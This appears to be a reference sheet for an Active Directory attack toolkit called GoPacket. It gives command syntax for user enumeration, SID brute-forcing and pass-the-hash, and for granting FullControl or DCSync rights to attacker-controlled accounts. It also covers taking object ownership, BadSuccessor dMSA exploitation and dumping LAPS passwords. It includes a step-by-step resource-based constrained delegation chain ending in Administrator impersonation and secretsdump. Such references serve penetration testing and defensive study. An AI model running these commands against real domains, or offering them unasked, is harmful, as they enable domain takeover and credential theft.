GoPacket β Active Directory
Quick Reference
| Tool | Purpose |
|---|---|
GetADUsers.py |
Enumerate AD user accounts |
GetADComputers.py |
Enumerate AD computer accounts |
addcomputer.py |
Add a computer account to the domain |
dacledit.py |
Read/write/remove DACL ACEs on AD objects |
rbcd.py |
Set/read/remove msDS-AllowedToActOnBehalfOfOtherIdentity (RBCD) |
findDelegation.py |
Enumerate all delegation relationships |
owneredit.py |
Read/change owner of an AD object |
badsuccessor.py |
dMSA exploitation (CVE-2025-29895 / BadSuccessor) |
lookupsid.py |
Enumerate users/groups via SID brute-force (RPC) |
samrdump.py |
Enumerate users via SAMR |
ldap_shell.py |
Interactive LDAP shell |
machineAccountQuota.py |
Read the ms-DS-MachineAccountQuota value |
GetLAPSPassword.py |
Read LAPS passwords from LDAP |
GetADUsers.py
Enumerate Active Directory user accounts via LDAP.
Syntax:
GetADUsers.py [options] <domain>[/<username>[:<password>]]
Common Usage:
# List all users with email addresses
GetADUsers.py <domain>/<username>:<password> -dc-ip <dc-ip>
# List ALL users including disabled / no-email
GetADUsers.py <domain>/<username>:<password> -all -dc-ip <dc-ip>
# Specific user
GetADUsers.py <domain>/<username>:<password> -user <username> -dc-ip <dc-ip>
# Pass-the-Hash
GetADUsers.py -hashes <lm-hash>:<nt-hash> <domain>/<username> -dc-ip <dc-ip>
# Kerberos (ccache)
KRB5CCNAME=<ticket> GetADUsers.py -k -no-pass <domain>/<username> -dc-ip <dc-ip>
Options:
- -user <username> β Query a specific user
- -all β Include disabled accounts and accounts without email
- -hashes <lm-hash>:<nt-hash> β NTLM hash auth
- -k / -no-pass β Kerberos via ccache
- -aesKey <aes256-key> β AES Kerberos key
- -dc-ip <dc-ip> β DC IP
- -dc-host <hostname> β DC hostname
GetADComputers.py
Enumerate Active Directory computer accounts via LDAP.
Syntax:
GetADComputers.py [options] <domain>[/<username>[:<password>]]
Common Usage:
# List all computers
GetADComputers.py <domain>/<username>:<password> -dc-ip <dc-ip>
# Resolve IPs (nslookup via DC)
GetADComputers.py <domain>/<username>:<password> -resolveIP -dc-ip <dc-ip>
# Specific computer
GetADComputers.py <domain>/<username>:<password> -user <computername> -dc-ip <dc-ip>
# Pass-the-Hash
GetADComputers.py -hashes <lm-hash>:<nt-hash> <domain>/<username> -dc-ip <dc-ip>
# Kerberos (ccache)
KRB5CCNAME=<ticket> GetADComputers.py -k -no-pass <domain>/<username> -dc-ip <dc-ip>
Options:
- -user <name> β Filter by specific computer name
- -resolveIP β Resolve computer IPs via DC nslookup
- -hashes <lm-hash>:<nt-hash> β NTLM hash auth
- -k / -no-pass β Kerberos via ccache
- -aesKey <aes256-key> β AES Kerberos key
- -dc-ip <dc-ip> β DC IP
- -dc-host <hostname> β DC hostname
addcomputer.py
Add a computer account to the domain (required for RBCD attacks when MAQ > 0).
Syntax:
addcomputer.py [options] <domain>/<username>[:<password>]
Common Usage:
# Add computer with random name and password (SAMR over SMB)
addcomputer.py <domain>/<username>:<password> -dc-ip <dc-ip>
# Add computer with specific name and password
addcomputer.py <domain>/<username>:<password> -dc-ip <dc-ip> \
-computer-name <computername>$ -computer-pass <password>
# Add via LDAPS
addcomputer.py <domain>/<username>:<password> -method LDAPS -dc-ip <dc-ip> \
-computer-name <computername>$ -computer-pass <password>
# Delete a computer account
addcomputer.py <domain>/<username>:<password> -dc-ip <dc-ip> \
-computer-name <computername>$ -delete
# Pass-the-Hash
addcomputer.py -hashes <lm-hash>:<nt-hash> <domain>/<username> -dc-ip <dc-ip>
# Kerberos (ccache)
KRB5CCNAME=<ticket> addcomputer.py -k -no-pass <domain>/<username> -dc-ip <dc-ip>
Options:
- -computer-name <name>$ β Name for the new computer (must end with $)
- -computer-pass <password> β Password for the new computer
- -no-add β Don't add, just set password on existing account
- -delete β Delete the specified computer account
- -method {SAMR,LDAPS} β Method (SAMR over SMB default, LDAPS requires cert)
- -port {139,445,636} β Port (SAMR default 445, LDAPS 636)
- -domain-netbios <name> β NetBIOS domain name
- -baseDN <dn> β LDAP base DN
- -computer-group <dn> β Target OU/group for the new computer
- -hashes <lm-hash>:<nt-hash> β NTLM hash auth
- -dc-ip <dc-ip> β DC IP
- -dc-host <hostname> β DC hostname
Notes:
- Check MAQ first: machineAccountQuota.py <domain>/<username>:<password>
- Default MAQ is 10 β any domain user can add up to 10 machines
dacledit.py
Read, write, remove, backup, or restore DACL ACEs on Active Directory objects.
Syntax:
dacledit.py [options] <domain>/<username>[:<password>]
Common Usage:
# Read DACL of a target object
dacledit.py <domain>/<username>:<password> -dc-ip <dc-ip> \
-target <target-user> -action read
# Grant FullControl to attacker-controlled account
dacledit.py <domain>/<username>:<password> -dc-ip <dc-ip> \
-principal <attacker-user> -target <target-object> \
-action write -rights FullControl
# Grant DCSync rights (DS-Replication-Get-Changes + DS-Replication-Get-Changes-All)
dacledit.py <domain>/<username>:<password> -dc-ip <dc-ip> \
-principal <username> -target <domain-dn> \
-action write -rights DCSync
# Grant ResetPassword
dacledit.py <domain>/<username>:<password> -dc-ip <dc-ip> \
-principal <username> -target <target-user> \
-action write -rights ResetPassword
# Grant WriteMembers (add self to group)
dacledit.py <domain>/<username>:<password> -dc-ip <dc-ip> \
-principal <username> -target <group-name> \
-action write -rights WriteMembers
# Remove an ACE
dacledit.py <domain>/<username>:<password> -dc-ip <dc-ip> \
-principal <username> -target <target-object> \
-action remove -rights FullControl
# Backup DACL before modification
dacledit.py <domain>/<username>:<password> -dc-ip <dc-ip> \
-target <target-object> -action backup -file <output>
# Restore DACL from backup
dacledit.py <domain>/<username>:<password> -dc-ip <dc-ip> \
-target <target-object> -action restore -file <output>
# Pass-the-Hash
dacledit.py -hashes <lm-hash>:<nt-hash> <domain>/<username> -dc-ip <dc-ip> \
-principal <username> -target <target> -action write -rights FullControl
# Use LDAPS
dacledit.py <domain>/<username>:<password> -use-ldaps -dc-ip <dc-ip> \
-principal <username> -target <target> -action write -rights FullControl
Options:
- -principal <name> β Attacker-controlled account (sAMAccountName)
- -principal-sid <sid> β Principal by SID
- -principal-dn <dn> β Principal by DN
- -target <name> β Target object to edit (sAMAccountName)
- -target-sid <sid> β Target by SID
- -target-dn <dn> β Target by DN
- -action [{read,write,remove,backup,restore}] β Action
- -rights [{FullControl,ResetPassword,WriteMembers,DCSync,Custom}] β Rights to set
- -rights-guid <guid> β Custom right GUID
- -ace-type [{allowed,denied}] β ACE type (default: allowed)
- -inheritance β Enable ACE inheritance (for OUs/containers)
- -mask <mask> β Force access mask
- -file <filename> β File for backup/restore
- -use-ldaps β Use LDAPS
- -hashes <lm-hash>:<nt-hash> β NTLM hash auth
- -dc-ip <dc-ip> β DC IP
rbcd.py
Read, write, remove, or flush msDS-AllowedToActOnBehalfOfOtherIdentity for RBCD attacks.
Syntax:
rbcd.py [options] -delegate-to <target> <domain>/<username>[:<password>]
Common Usage:
# Read current RBCD settings on a target
rbcd.py -delegate-to <target-computer>$ -action read \
<domain>/<username>:<password> -dc-ip <dc-ip>
# Write RBCD β allow attacker computer to delegate to target
rbcd.py -delegate-to <target-computer>$ -delegate-from <attacker-computer>$ \
-action write <domain>/<username>:<password> -dc-ip <dc-ip>
# Remove RBCD entry
rbcd.py -delegate-to <target-computer>$ -delegate-from <attacker-computer>$ \
-action remove <domain>/<username>:<password> -dc-ip <dc-ip>
# Flush all RBCD entries
rbcd.py -delegate-to <target-computer>$ -action flush \
<domain>/<username>:<password> -dc-ip <dc-ip>
# Pass-the-Hash
rbcd.py -hashes <lm-hash>:<nt-hash> -delegate-to <target-computer>$ \
-delegate-from <attacker-computer>$ -action write <domain>/<username> -dc-ip <dc-ip>
# Use LDAPS
rbcd.py -use-ldaps -delegate-to <target-computer>$ -delegate-from <attacker-computer>$ \
-action write <domain>/<username>:<password> -dc-ip <dc-ip>
Options:
- -delegate-to <name> β Target computer account (the one being delegated TO)
- -delegate-from <name> β Attacker computer account (the one that will delegate)
- -action [{read,write,remove,flush}] β Action to perform
- -use-ldaps β Use LDAPS
- -hashes <lm-hash>:<nt-hash> β NTLM hash auth
- -k / -no-pass β Kerberos via ccache
- -aesKey <aes256-key> β AES Kerberos key
- -dc-ip <dc-ip> β DC IP
- -dc-host <hostname> β DC hostname
Full RBCD Attack Chain:
# 1. Add machine account
addcomputer.py <domain>/<username>:<password> -dc-ip <dc-ip> \
-computer-name FAKE$ -computer-pass FakePass123!
# 2. Write RBCD
rbcd.py -delegate-to <target>$ -delegate-from FAKE$ -action write \
<domain>/<username>:<password> -dc-ip <dc-ip>
# 3. Get impersonation ticket
getST.py -spn cifs/<target> -impersonate Administrator \
-dc-ip <dc-ip> -hashes aad3b435b51404eeaad3b435b51404ee:<nt-hash> \
<domain>/FAKE$
# 4. Use ticket
KRB5CCNAME=Administrator@cifs_<target>.ccache secretsdump.py -k -no-pass \
<domain>/Administrator@<target>
findDelegation.py
Enumerate all delegation relationships in the domain (unconstrained, constrained, RBCD).
Syntax:
findDelegation.py [options] <domain>[/<username>[:<password>]]
Common Usage:
# Enumerate all delegations
findDelegation.py <domain>/<username>:<password> -dc-ip <dc-ip>
# Include disabled accounts
findDelegation.py <domain>/<username>:<password> -disabled -dc-ip <dc-ip>
# Specific user
findDelegation.py <domain>/<username>:<password> -user <username> -dc-ip <dc-ip>
# Cross-trust
findDelegation.py <domain>/<username>:<password> -target-domain <domain> -dc-ip <dc-ip>
# Pass-the-Hash
findDelegation.py -hashes <lm-hash>:<nt-hash> <domain>/<username> -dc-ip <dc-ip>
Options:
- -user <username> β Filter by specific user
- -disabled β Include disabled accounts
- -target-domain <domain> β Query across trust
- -hashes <lm-hash>:<nt-hash> β NTLM hash auth
- -k / -no-pass β Kerberos via ccache
- -aesKey <aes256-key> β AES Kerberos key
- -dc-ip <dc-ip> β DC IP
- -dc-host <hostname> β DC hostname
Notes:
- Look for TRUSTED_FOR_DELEGATION β unconstrained delegation (highest value)
- Look for msDS-AllowedToDelegateTo β constrained delegation
- Look for msDS-AllowedToActOnBehalfOfOtherIdentity β RBCD
owneredit.py
Read or change the owner attribute of an Active Directory object.
Syntax:
owneredit.py [options] <domain>/<username>[:<password>]
Common Usage:
# Read current owner
owneredit.py <domain>/<username>:<password> -dc-ip <dc-ip> \
-target <target-object> -action read
# Set new owner (take ownership of an object)
owneredit.py <domain>/<username>:<password> -dc-ip <dc-ip> \
-new-owner <attacker-username> -target <target-object> -action write
# Pass-the-Hash
owneredit.py -hashes <lm-hash>:<nt-hash> <domain>/<username> -dc-ip <dc-ip> \
-new-owner <username> -target <target> -action write
# Use LDAPS
owneredit.py <domain>/<username>:<password> -use-ldaps -dc-ip <dc-ip> \
-new-owner <username> -target <target> -action write
Options:
- -new-owner <name> β sAMAccountName of new owner
- -new-owner-sid <sid> β New owner by SID
- -new-owner-dn <dn> β New owner by DN
- -target <name> β Target object (sAMAccountName)
- -target-sid <sid> β Target by SID
- -target-dn <dn> β Target by DN
- -action [{read,write}] β Action
- -use-ldaps β Use LDAPS
- -hashes <lm-hash>:<nt-hash> β NTLM hash auth
- -dc-ip <dc-ip> β DC IP
Notes:
- After taking ownership, use dacledit.py to grant FullControl to self
badsuccessor.py
dMSA (Delegated Managed Service Accounts) exploitation β BadSuccessor / CVE-2025-29895.
Syntax:
badsuccessor.py [options] <domain>/<username>[:<password>]
Common Usage:
# Search for existing dMSAs
badsuccessor.py <domain>/<username>:<password> -dc-ip <dc-ip> -action search
# Add a new dMSA in a specific OU (to inherit target account's privileges)
badsuccessor.py <domain>/<username>:<password> -dc-ip <dc-ip> \
-action add -target-ou "OU=weakOU,DC=<domain>,DC=local"
# Add dMSA with specific name targeting DA account
badsuccessor.py <domain>/<username>:<password> -dc-ip <dc-ip> \
-action add -target-ou "OU=weakOU,DC=<domain>,DC=local" \
-dmsa-name evilDMSA -target-account Administrator
# Modify existing dMSA to target a specific account
badsuccessor.py <domain>/<username>:<password> -dc-ip <dc-ip> \
-action modify -target-ou "OU=weakOU,DC=<domain>,DC=local" \
-dmsa-name evilDMSA -target-account Administrator
# Delete a dMSA
badsuccessor.py <domain>/<username>:<password> -dc-ip <dc-ip> \
-action delete -target-ou "OU=weakOU,DC=<domain>,DC=local" \
-dmsa-name evilDMSA
# Use LDAPS
badsuccessor.py <domain>/<username>:<password> -dc-ip <dc-ip> \
-method LDAPS -action add -target-ou "OU=weakOU,DC=<domain>,DC=local"
Options:
- -action {add,delete,modify,search} β Action
- -dmsa-name <name> β dMSA name (random if omitted)
- -target-ou <dn> β OU to create the dMSA in
- -target-account <username> β Account to set as ManagedAccountPrecededByLink
- -principals-allowed <username> β Account allowed to retrieve managed password
- -dns-hostname <hostname> β DNS hostname for dMSA
- -method {LDAP,LDAPS} β Protocol
- -port {389,636} β Port
- -hashes <lm-hash>:<nt-hash> β NTLM hash auth
- -dc-ip <dc-ip> β DC IP
- -dc-host <hostname> β DC hostname
lookupsid.py
Enumerate users, groups, and domain SIDs by brute-forcing RIDs over SMB.
Syntax:
lookupsid.py [options] <domain>/<username>:<password>@<target> [maxRid]
Common Usage:
# Enumerate all SIDs up to RID 4000
lookupsid.py <domain>/<username>:<password>@<target>
# Custom max RID
lookupsid.py <domain>/<username>:<password>@<target> 10000
# Get domain SID (used for ticket forging)
lookupsid.py <domain>/<username>:<password>@<target> | grep 'Domain SID'
# Enumerate domain SIDs (forward to DC)
lookupsid.py <domain>/<username>:<password>@<target> -domain-sids
# Pass-the-Hash
lookupsid.py -hashes <lm-hash>:<nt-hash> <domain>/<username>@<target>
# Unauthenticated (null session β rare but possible)
lookupsid.py -no-pass <domain>/anonymous@<target>
Options:
- maxRid β Max RID to check (default 4000)
- -domain-sids β Enumerate domain SIDs
- -target-ip <target> β Target IP when name can't resolve
- -port <port> β Destination port
- -hashes <lm-hash>:<nt-hash> β NTLM hash auth
- -k β Kerberos auth
samrdump.py
Enumerate user accounts via SAMR (Security Account Manager Remote Protocol).
Syntax:
samrdump.py [options] <domain>/<username>:<password>@<target>
Common Usage:
# List users
samrdump.py <domain>/<username>:<password>@<target>
# CSV output
samrdump.py -csv <domain>/<username>:<password>@<target>
# Pass-the-Hash
samrdump.py -hashes <lm-hash>:<nt-hash> <domain>/<username>@<target>
# Kerberos (ccache)
KRB5CCNAME=<ticket> samrdump.py -k -no-pass <domain>/<username>@<target>
Options:
- -csv β Output in CSV format
- -hashes <lm-hash>:<nt-hash> β NTLM hash auth
- -k / -no-pass β Kerberos via ccache
- -aesKey <aes256-key> β AES Kerberos key
- -dc-ip <dc-ip> β DC IP
- -target-ip <target> β Target IP override
- -port <port> β Destination port
ldap_shell.py
Interactive LDAP shell for AD enumeration and modification.
Syntax:
ldap_shell.py [options] <domain>/<username>:<password>@<target>
Common Usage:
# Connect with password
ldap_shell.py <domain>/<username>:<password>@<dc-ip>
# Pass-the-Hash
ldap_shell.py -hashes <lm-hash>:<nt-hash> <domain>/<username>@<dc-ip>
# Kerberos (ccache)
KRB5CCNAME=<ticket> ldap_shell.py -k -no-pass <domain>/<username>@<dc-ip>
# Use LDAPS
ldap_shell.py -ldaps <domain>/<username>:<password>@<dc-ip>
# Dump LDAP to directory
ldap_shell.py <domain>/<username>:<password>@<dc-ip> -dump-dir /tmp/ldapdump
Options:
- -hashes <lm-hash>:<nt-hash> β NTLM hash auth
- -k / -no-pass β Kerberos via ccache
- -aesKey <aes256-key> β AES Kerberos key
- -dc-ip <dc-ip> β DC IP
- -ldaps β Use LDAPS
- -dump-dir <path> β Directory for domain dump files
Shell Commands (once connected):
help β list available commands
get_ad_users β list all AD users
get_ad_groups β list all AD groups
get_laps_password <cn> β read LAPS password
add_computer <name> <password>
change_password <user> <newpass>
set_rbcd <attacker$> <target$>
add_user_to_group <user> <group>
machineAccountQuota.py
Read the ms-DS-MachineAccountQuota attribute β how many machines a regular user can add.
Syntax:
machineAccountQuota.py [options] <domain>/<username>[:<password>]
Common Usage:
# Check MAQ
machineAccountQuota.py <domain>/<username>:<password> -dc-ip <dc-ip>
# Pass-the-Hash
machineAccountQuota.py -hashes <lm-hash>:<nt-hash> <domain>/<username> -dc-ip <dc-ip>
# Use LDAPS
machineAccountQuota.py -use-ldaps <domain>/<username>:<password> -dc-ip <dc-ip>
Options:
- -use-ldaps β Use LDAPS
- -hashes <lm-hash>:<nt-hash> β NTLM hash auth
- -k / -no-pass β Kerberos via ccache
- -aesKey <aes256-key> β AES Kerberos key
- -dc-ip <dc-ip> β DC IP
Notes:
- Default MAQ = 10 (any authenticated user can add 10 machines)
- MAQ = 0 means only admins can add computers β need existing machine account creds for RBCD
GetLAPSPassword.py
Extract LAPS (Local Administrator Password Solution) passwords from LDAP for readable computer objects.
Syntax:
GetLAPSPassword.py [options] <domain>[/<username>[:<password>]]
Common Usage:
# Dump all readable LAPS passwords
GetLAPSPassword.py <domain>/<username>:<password> -dc-ip <dc-ip>
# Target specific computer
GetLAPSPassword.py <domain>/<username>:<password> -dc-ip <dc-ip> \
-computer <computername>
# Save to file
GetLAPSPassword.py <domain>/<username>:<password> -dc-ip <dc-ip> \
-outputfile <output>
# Pass-the-Hash
GetLAPSPassword.py -hashes <lm-hash>:<nt-hash> <domain>/<username> -dc-ip <dc-ip>
# Kerberos (ccache)
KRB5CCNAME=<ticket> GetLAPSPassword.py -k -no-pass <domain>/<username> -dc-ip <dc-ip>
# Use LDAPS (required for Windows Server 2025 with LDAPS enforcement)
GetLAPSPassword.py <domain>/<username>:<password> -dc-ip <dc-ip> -ldaps
Options:
- -computer <name> β Target a specific computer by name
- -outputfile <output> β Save output to file
- -ldaps β Use LDAPS
- -hashes <lm-hash>:<nt-hash> β NTLM hash auth
- -k / -no-pass β Kerberos via ccache
- -aesKey <aes256-key> β AES Kerberos key
- -dc-ip <dc-ip> β DC IP
- -dc-host <hostname> β DC hostname
Notes:
- Reads ms-Mcs-AdmPwd (LAPSv1) or msLAPS-Password (LAPSv2)
- Only returns passwords readable by the authenticated user's ACL